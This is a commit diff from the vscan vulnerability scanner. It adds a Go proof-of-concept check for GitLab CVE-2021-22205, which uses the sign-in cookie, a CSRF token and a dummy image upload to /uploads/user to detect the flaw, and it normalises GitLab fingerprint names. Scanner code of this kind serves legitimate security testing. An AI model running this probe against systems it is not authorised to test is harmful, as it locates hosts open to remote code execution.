Add POC CVE-2021-22205

veo · Apr 27, 2022 · e82e80d · e82e80d
1 parent fb04b4c
commit e82e80d
Show file tree

Hide file tree

Showing 4 changed files with 79 additions and 8 deletions.
diff --git a/pkg/fingerprint/eHoleFingerData.go b/pkg/fingerprint/eHoleFingerData.go
@@ -207,7 +207,7 @@ var eHoleFinger = `{
 		"location": "body",
 		"keyword": ["jboss.css"]
 	}, {
-		"cms": "Gitlab",
+		"cms": "GitLab",
 		"method": "keyword",
 		"location": "body",
 		"keyword": ["assets/gitlab_logo"]
@@ -762,7 +762,7 @@ var eHoleFinger = `{
 		"location": "body",
 		"keyword": ["1835479497"]
 	}, {
-		"cms": "Gitlab",
+		"cms": "GitLab",
 		"method": "faviconhash",
 		"location": "body",
 		"keyword": ["1278323681"]
@@ -1227,7 +1227,7 @@ var eHoleFinger = `{
 		"location": "body",
 		"keyword": ["2071993228"]
 	}, {
-		"cms": "Gitlab",
+		"cms": "GitLab",
 		"method": "faviconhash",
 		"location": "body",
 		"keyword": ["516963061"]

diff --git a/pkg/fingerprint/localFingerData.go b/pkg/fingerprint/localFingerData.go
@@ -4322,27 +4322,27 @@ var localFinger = `{
 		"location": "body",
 		"keyword": ["content=\"Gitea - Git with a cup of tea\""]
 	},{
-		"cms": "gitlab",
+		"cms": "GitLab",
 		"method": "keyword",
 		"location": "body",
 		"keyword": ["gon.default_issues_tracker"]
 	},{
-		"cms": "gitlab",
+		"cms": "GitLab",
 		"method": "keyword",
 		"location": "body",
 		"keyword": ["content=\"gitlab community edition\""]
 	},{
-		"cms": "gitlab",
+		"cms": "GitLab",
 		"method": "keyword",
 		"location": "body",
 		"keyword": ["content=\"gitlab "]
 	},{
-		"cms": "gitlab",
+		"cms": "GitLab",
 		"method": "keyword",
 		"location": "body",
 		"keyword": ["<a href=\"https://about.gitlab.com/\">about gitlab"]
 	},{
-		"cms": "gitlab",
+		"cms": "GitLab",
 		"method": "keyword",
 		"location": "body",
 		"keyword": ["class=\"col-sm-7 brand-holder pull-left\""]

diff --git a/pocs_go/gitlab/CVE_2021_22205.go b/pocs_go/gitlab/CVE_2021_22205.go
@@ -0,0 +1,66 @@
+package gitlab
+
+import (
+	"bytes"
+	"fmt"
+	"github.com/veo/vscan/pkg"
+	"mime/multipart"
+	"net/textproto"
+	"regexp"
+	"strings"
+)
+
+func CVE_2021_22205(url string) bool {
+	if req, err := pkg.HttpRequset(url+"/users/sign_in", "GET", "", false, nil); err == nil {
+		if req.StatusCode == 200 {
+			var cookie string
+			var csrf string
+			if req.Header != nil {
+				var SetCookieAll string
+				for i := range req.Header["Set-Cookie"] {
+					SetCookieAll += req.Header["Set-Cookie"][i]
+				}
+				cookie = regexp.MustCompile("_gitlab_session=(.*?);").FindString(SetCookieAll)
+				//if len(counts) > 1 {
+				//	cookie = counts[1]
+				//}
+			}
+			if req.Body != "" {
+				csrfToken := regexp.MustCompile("<meta name=\"csrf-token\" content=\"(.*?)\"").FindStringSubmatch(req.Body)
+				if len(csrfToken) > 1 {
+					csrf = csrfToken[1]
+				}
+			}
+			if cookie != "" && csrf != "" {
+				return upload(url, cookie, csrf)
+			}
+		}
+	}
+	return false
+}
+
+func upload(u string, cookie string, csrf string) bool {
+	buf := new(bytes.Buffer)
+	w := multipart.NewWriter(buf)
+	h := make(textproto.MIMEHeader)
+	h.Set("Content-Disposition", `form-data; name="file"; filename="1.jpg"`)
+	h.Set("Content-Type", "image/jpeg")
+	fw, err := w.CreatePart(h)
+	if err != nil {
+		return false
+	}
+	_, _ = fw.Write([]byte("1"))
+	boundary := w.Boundary()
+	_ = w.Close()
+	header := make(map[string]string)
+	header["Content-Type"] = "multipart/form-data; boundary=" + boundary
+	header["Cookie"] = cookie
+	header["X-CSRF-Token"] = csrf
+	if req, err := pkg.HttpRequset(u+"/uploads/user", "POST", buf.String(), false, header); err == nil {
+		if strings.Contains(req.Body, "Failed to process image") {
+			pkg.GoPocLog(fmt.Sprintf("Found vuln gitlab CVE_2021_22205|%s\n", u))
+			return true
+		}
+	}
+	return false
+}
diff --git a/pocs_go/go_poc_check.go b/pocs_go/go_poc_check.go
@@ -6,6 +6,7 @@ import (
 	"github.com/veo/vscan/pocs_go/Springboot"
 	"github.com/veo/vscan/pocs_go/ThinkPHP"
 	"github.com/veo/vscan/pocs_go/fastjson"
+	"github.com/veo/vscan/pocs_go/gitlab"
 	"github.com/veo/vscan/pocs_go/jboss"
 	"github.com/veo/vscan/pocs_go/jenkins"
 	"github.com/veo/vscan/pocs_go/log4j"
@@ -176,6 +177,10 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, chec
 			if Springboot.CVE_2022_22947(URL) {
 				technologies = append(technologies, "exp-SpringGateway|CVE_2022_22947")
 			}
+		case "GitLab":
+			if gitlab.CVE_2021_22205(URL) {
+				technologies = append(technologies, "exp-gitlab|CVE_2021_22205")
+			}
 		}
 		if checklog4j {
 			if log4j.Check(URL, finalURL) {